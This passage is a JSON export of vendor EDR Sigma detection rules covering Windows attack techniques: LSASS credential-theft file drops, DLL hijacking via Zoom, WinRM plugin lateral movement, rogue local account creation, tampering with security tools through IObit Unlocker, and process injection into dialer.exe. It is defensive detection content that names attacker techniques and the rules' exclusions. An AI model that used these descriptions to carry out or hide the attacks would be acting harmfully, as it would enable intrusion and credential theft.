service\n filter_service:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_trendmicro:\n ProcessOriginalFileName: 'housecall.ATTK.exe'\n ProcessSignature: 'Trend Micro, Inc.'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "736eb5a5-5ffc-4053-ab85-8177f25877ae",
"rule_name": "Remote Registry Service Enabled via Registry",
"rule_description": "Detects when the Remote Registry Service is enabled via a registry modification.\nThis service is disabled by default on workstations (starting with Windows 8) and enabled on servers.\nAn adversary can remotely manipulate the registry of another machine if the Remote Registry service is enabled and valid credentials are obtained.\nIt can be used by an attacker to prepare a lateral movement technique, discover the configuration of a host, achieve persistence, or anything that aids an adversary in achieving their objective.\nIt is recommended to analyze the authentications and network activity around this alert to determine the user and host responsible for this action and to determine whether this action is legitimate.\n",
"rule_creation_date": "2023-09-13",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "73880030-9535-4813-a1fb-855b5c356e40",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.596895Z",
"creation_date": "2026-03-23T11:45:34.596898Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596906Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_zoom.yml",
"content": "title: DLL Hijacking via Zoom.exe\nid: 73880030-9535-4813-a1fb-855b5c356e40\ndescription: |\n Detects potential Windows DLL Hijacking via Zoom.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Zoom'\n ProcessSignature: 'Zoom Video Communications, Inc.'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "73880030-9535-4813-a1fb-855b5c356e40",
"rule_name": "DLL Hijacking via Zoom.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Zoom.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "73bb710a-a580-407e-bcb8-8d438b2105a2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628048Z",
"creation_date": "2026-03-23T11:45:34.628050Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628054Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/",
"https://github.com/gentilkiwi/mimikatz"
],
"name": "t1003_001_lsass_dropping_file.yml",
"content": "title: File Dropped by LSASS Process\nid: 73bb710a-a580-407e-bcb8-8d438b2105a2\ndescription: |\n Detects when a file is written to disk by the Local Security Authority Subsystem Service (LSASS) process.\n The LSASS process is responsible for authentications in Windows.\n Adversaries may attempt to access credential material stored in the LSASS' process memory.\n A file dropped by the LSASS process could be the result of credential theft.\n It is recommended to investigate processes loaded before LSASS dropped this file as well as to download the dropped file for analysis.\n If this activity is recurrent in your environment and you've determined its legitimacy, it is highly recommended to whitelist the concerned path.\nreferences:\n - https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/\n - https://github.com/gentilkiwi/mimikatz\ndate: 2023/03/28\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\lsass.exe'\n MinimalStackTrace: '?*' # Enforce stacktrace presence\n\n # This is handled by the rule 02b0f6f4-476e-4b12-8067-6fbac9b0fc30\n filter_unknown:\n MinimalStackTrace|endswith: '|UNKNOWN'\n\n filter_knwon_ssp:\n MinimalStackTrace|contains:\n - '|aadcloudap.dll|'\n - '|CertPolEng.dll'\n - '|cloudAP.dll|'\n - '|cps3_pkcs11_w64.dll|'\n - '|cryptnet.dll|'\n - '|dpapisrv.dll|'\n - '|dsreg.dll|laps.dll|'\n - '|dsrolesrv.dll|'\n - '|efscore.dll|'\n - '|ElPassFilt.dll|'\n - '|esent.dll|'\n - '|idoMinidriverIAS.dll|'\n - '|lsasrv.dll|'\n - '|McAfeeTrueKeyPasswordFilter.dll|'\n - '|ncryptprov.dll|'\n - '|netlogon.dll|'\n - '|passhook.dll|'\n - '|passwdhk.dll|'\n - '|PCPKsp.dll|'\n - '|rpcrt4.dll|'\n - '|scecli.dll|'\n - '|schannel.dll'\n - '|SFAPM.dll|'\n - '|SppFilter.dll|'\n - '|vaultsvc.dll|'\n - '|webio.dll|'\n - '|Windows.Security.Authentication.Web.Core.dll|'\n - '|wsauth.dll|'\n\n exclusion_crypt:\n MinimalStackTrace|endswith: '|crypt32.dll'\n\n exclusion_unknown:\n MinimalStackTrace: 'ntdll.dll|*|UNKNOWN|UNKNOWN|UNKNOWN|*|kernel32.dll|ntdll.dll'\n\n exclusion_ntdll:\n MinimalStackTrace: 'ntdll.dll'\n\n exclusion_access_failed:\n MinimalStackTrace|contains: 'ACCESS_FAILED|'\n\n exclusion_dcagent:\n MinimalStackTrace|contains: '|dcagent.dll|'\n Path:\n - '?:\\dcagentlog.txt'\n - '?:\\Program Files\\Fortinet\\FSAE\\dcagentlog.txt'\n\n exclusion_ntfrsapi:\n MinimalStackTrace|contains:\n - '|ntfrsapi.dll|'\n - '|dfsrapi.dll|'\n Path|contains:\n - '\\DfsrApi*.log'\n - '\\DfsrApi*.log.gz'\n\n exclusion_netlogon:\n Path: '?:\\Windows\\System32\\config\\netlogon.ftl'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "73bb710a-a580-407e-bcb8-8d438b2105a2",
"rule_name": "File Dropped by LSASS Process",
"rule_description": "Detects when a file is written to disk by the Local Security Authority Subsystem Service (LSASS) process.\nThe LSASS process is responsible for authentications in Windows.\nAdversaries may attempt to access credential material stored in the LSASS' process memory.\nA file dropped by the LSASS process could be the result of credential theft.\nIt is recommended to investigate processes loaded before LSASS dropped this file as well as to download the dropped file for analysis.\nIf this activity is recurrent in your environment and you've determined its legitimacy, it is highly recommended to whitelist the concerned path.\n",
"rule_creation_date": "2023-03-28",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "73e08a31-0ad6-4cdb-bbba-777eb209030f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610396Z",
"creation_date": "2026-03-23T11:45:34.610400Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610407Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_unprivileged_process_spawning_system_process.yml",
"content": "title: Unprivileged Process Spawning SYSTEM-privileged Process\nid: 73e08a31-0ad6-4cdb-bbba-777eb209030f\ndescription: |\n Detects unprivileged processes spawning privileged processes.\n This can be indicative of Windows kernel or third-party driver exploitation for privilege escalation.\n It is recommended to investigate the process launched with SYSTEM privileges to look for malicious contents.\nreferences:\n - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n - https://attack.mitre.org/techniques/T1068/\ndate: 2022/09/07\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n IntegrityLevel: 'System'\n User: 'NT AUTHORITY\\SYSTEM'\n ParentIntegrityLevel:\n - 'Low'\n - 'Medium'\n\n exclusion_conhost:\n ProcessCommandLine:\n - '\\\\\\?\\?\\\\?:\\windows\\system32\\conhost.exe 0xffffffff -ForceV1'\n - '\\\\\\?\\?\\\\?:\\Windows\\system32\\conhost.exe 0xffffffff'\n - '\\\\\\?\\?\\\\?:\\WINDOWS\\system32\\conhost.exe 0x4'\n\n exclusion_werfault_1:\n # ?:\\windows\\system32\\WerMgr.exe -datacollectorcreate 11556 1196\n ProcessImage:\n - '?:\\Windows\\System32\\wermgr.exe'\n - '?:\\Windows\\Syswow64\\wermgr.exe'\n ProcessCommandLine|contains: '-datacollectorcreate'\n # werfault.exe /hc /shared Global\\0392bf7f15864fb5906be16f2af3f3b0 /t 10276 /p 9788\n ProcessParentCommandLine|contains|all:\n - '/shared '\n - ' Global'\n ProcessGrandparentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_werfault_2:\n Image:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\Syswow64\\WerFault.exe'\n CommandLine|contains|all:\n - ' -pss '\n - ' -s '\n - ' -p '\n - ' -ip '\n\n exclusion_siemens:\n # C:\\Program Files\\Siemens\\Automation\\AWB_V2\\host\\awb\\server\\dist\\node.exe\n # C:\\Program Files\\Siemens\\Automation\\TIAADMIN\\server\\node.exe\n ProcessImage: '?:\\Program Files\\Siemens\\Automation\\\\*\\node.exe'\n ProcessParentImage: '?:\\Program Files\\Siemens\\Automation\\\\*\\node.exe'\n ProcessGrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ivanti:\n ProcessImage: '?:\\Program Files (x86)\\Ivanti\\EPM Agent\\CommonMonitor\\collector.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "73e08a31-0ad6-4cdb-bbba-777eb209030f",
"rule_name": "Unprivileged Process Spawning SYSTEM-privileged Process",
"rule_description": "Detects unprivileged processes spawning privileged processes.\nThis can be indicative of Windows kernel or third-party driver exploitation for privilege escalation.\nIt is recommended to investigate the process launched with SYSTEM privileges to look for malicious contents.\n",
"rule_creation_date": "2022-09-07",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7420063d-e8f8-4eb6-bcd4-1fb8c0d6f69d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624409Z",
"creation_date": "2026-03-23T11:45:34.624411Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624415Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://falconforce.nl/exploring-winrm-plugins-for-lateral-movement/",
"https://github.com/FalconForceTeam/bof-winrm-plugin-jump",
"https://attack.mitre.org/techniques/T1547/",
"https://attack.mitre.org/techniques/T1021/006/"
],
"name": "t1021_006_winrm_plugin.yml",
"content": "title: WinRM Plugins Lateral Movement\nid: 7420063d-e8f8-4eb6-bcd4-1fb8c0d6f69d\ndescription: |\n Detects a suspicious WinRM plugin remote creation.\n WinRM offers an API to accept third-party plugins. These plugins consist of DLLs that need to be located in the System32 folder.\n They are stored in the registry under the key \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN\\Plugin\".\n Threat actors can remotely create a WinRM plugin pointing to a malicious DLL using the registry remote service or COM programming.\n Restarting the WinRM service will make wmsprovhost.exe (the process spawned by the WinRM service) load the DLL.\n It is recommended to investigate the IP address from where the registry value was modified and the libraries loaded by wmsprovhost.exe for suspicious activities.\nreferences:\n - https://falconforce.nl/exploring-winrm-plugins-for-lateral-movement/\n - https://github.com/FalconForceTeam/bof-winrm-plugin-jump\n - https://attack.mitre.org/techniques/T1547/\n - https://attack.mitre.org/techniques/T1021/006/\ndate: 2025/01/21\nmodified: 2025/12/02\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.006\n - attack.persistence\n - attack.t1547\n - classification.Windows.Source.Registry\n - classification.Windows.HackTool.WinRMPluginJump\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_registry_value:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN\\Plugin\\\\*\\ConfigXML'\n\n selection_remote:\n - SessionLogonType: 3\n - ProcessSessionLogonType: 3 # Network Session\n\n exclusion_legit_plugins:\n Details|contains:\n - 'Filename=\"%windir%\\system32\\pwrshplugin.dll\"'\n - 'Filename=\"C:\\WINDOWS\\system32\\pwrshplugin.dll\"'\n - 'Filename=\"%windir%\\system32\\PowerShell\\7.?.?\\pwrshplugin.dll\"'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7420063d-e8f8-4eb6-bcd4-1fb8c0d6f69d",
"rule_name": "WinRM Plugins Lateral Movement",
"rule_description": "Detects a suspicious WinRM plugin remote creation.\nWinRM offers an API to accept third-party plugins. These plugins consist of DLLs that need to be located in the System32 folder.\nThey are stored in the registry under the key \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN\\Plugin\".\nThreat actors can remotely create a WinRM plugin pointing to a malicious DLL using the registry remote service or COM programming.\nRestarting the WinRM service will make wmsprovhost.exe (the process spawned by the WinRM service) load the DLL.\nIt is recommended to investigate the IP address from where the registry value was modified and the libraries loaded by wmsprovhost.exe for suspicious activities.\n",
"rule_creation_date": "2025-01-21",
"rule_modified_date": "2025-12-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1021.006",
"attack.t1547"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "74259026-c475-45cc-bac2-fb2a5768e419",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079894Z",
"creation_date": "2026-03-23T11:45:34.079896Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079900Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.reliaquest.com/blog/double-extortion-attack-analysis/",
"https://www.iobit.com/fr/iobit-unlocker.php",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_execution_of_iobitunlocker.yml",
"content": "title: Execution of IObit Unlocker\nid: 74259026-c475-45cc-bac2-fb2a5768e419\ndescription: |\n Detects the execution of IObit Unlocker.\n IObit Unlocker is a free utility tool that allows the removal of files and folders that are currently being locked by the system because used by another program or resource.\n Adversaries may used this tool to modify and/or disable security tools and avoid possible detection of their malicious actions.\n It is recommended to investigate the parent process for suspicious activities as well as to verify that the integrity of the EDR and other security solutions running on the host, as they may have been tampered with by the tool.\nreferences:\n - https://www.reliaquest.com/blog/double-extortion-attack-analysis/\n - https://www.iobit.com/fr/iobit-unlocker.php\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/09/19\nmodified: 2025/01/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.IOBitUnlocker\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\IObitUnlocker.exe'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "74259026-c475-45cc-bac2-fb2a5768e419",
"rule_name": "Execution of IObit Unlocker",
"rule_description": "Detects the execution of IObit Unlocker.\nIObit Unlocker is a free utility tool that allows the removal of files and folders that are currently being locked by the system because used by another program or resource.\nAdversaries may used this tool to modify and/or disable security tools and avoid possible detection of their malicious actions.\nIt is recommended to investigate the parent process for suspicious activities as well as to verify that the integrity of the EDR and other security solutions running on the host, as they may have been tampered with by the tool.\n",
"rule_creation_date": "2023-09-19",
"rule_modified_date": "2025-01-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "742a1f89-039d-459e-b772-50a881353a76",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623137Z",
"creation_date": "2026-03-23T11:45:34.623139Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623143Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1136/001/"
],
"name": "t1136_001_powershell_create_user.yml",
"content": "title: Local User Created Interactively via PowerShell\nid: 742a1f89-039d-459e-b772-50a881353a76\ndescription: |\n Detects the usage of PowerShell in an interactive session to create a new local user.\n Adversaries may create a local account to maintain access to victim systems.\n It is recommended to analyze other commands executed within the PowerShell session using the telemetry to determine whether this actions is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1136/001/\ndate: 2022/11/07\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1136.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_command:\n PowershellCommand|contains: 'New-LocalUser '\n\n # To avoid FP on commandlets that don't necessarly execute the command\n selection_args:\n PowershellCommand|contains:\n - ' -N' # For -Name or -NoPassword\n - ' -P' # For -Password\n\n filter_script:\n PowershellScriptPath|contains: '?'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_alticap:\n ProcessImage: '?:\\ProgramData\\Alticap\\temp\\temp-affairmazdaacuitynrc.exe'\n\n exclusion_cc3:\n ProcessOriginalFileName: 'ScanCC3'\n ProcessCompany: 'RISO France'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "742a1f89-039d-459e-b772-50a881353a76",
"rule_name": "Local User Created Interactively via PowerShell",
"rule_description": "Detects the usage of PowerShell in an interactive session to create a new local user.\nAdversaries may create a local account to maintain access to victim systems.\nIt is recommended to analyze other commands executed within the PowerShell session using the telemetry to determine whether this actions is legitimate.\n",
"rule_creation_date": "2022-11-07",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1136.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "74422f0a-4d43-4762-b069-3d5862f1ae35",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079826Z",
"creation_date": "2026-03-23T11:45:34.079828Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079832Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_dialer.yml",
"content": "title: Dialer.exe Sacrificial Process Spawned\nid: 74422f0a-4d43-4762-b069-3d5862f1ae35\ndescription: |\n Detects the suspicious execution of the legitimate Windows binary dialer.exe, spawned without arguments. This can mean that the binary is being used as sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used by Rhadamanthys, a malicious information stealer which is being distributed mostly via malicious Google advertisements.\n It is recommended to investigate the parent process performing this action and the destination IP address of the dialer.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/03/27\nmodified: 2025/10/02\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SacrificialProcess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\System32\\dialer.exe'\n\n filter_parent:\n ParentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\System32\\sihost.exe'\n\n # https://houseonthehill.com/\n exclusion_supdskcs:\n ProcessParentOriginalFileName: 'SupDskCs.exe'\n ProcessParentDescription: 'SupportDesk Desktop'\n\n exclusion_logosw:\n ParentImage:\n - '?:\\Program Files (x86)\\LOGOSw\\agendum.exe'\n - '?:\\Program Files (x86)\\LOGOSw\\LOGOS_w.exe'\n\n # https://www.prospective-fr.com/\n exclusion_prospective:\n ProcessParentOriginalFileName: 'Prospective.exe'\n ProcessParentSigned: 'true'\n 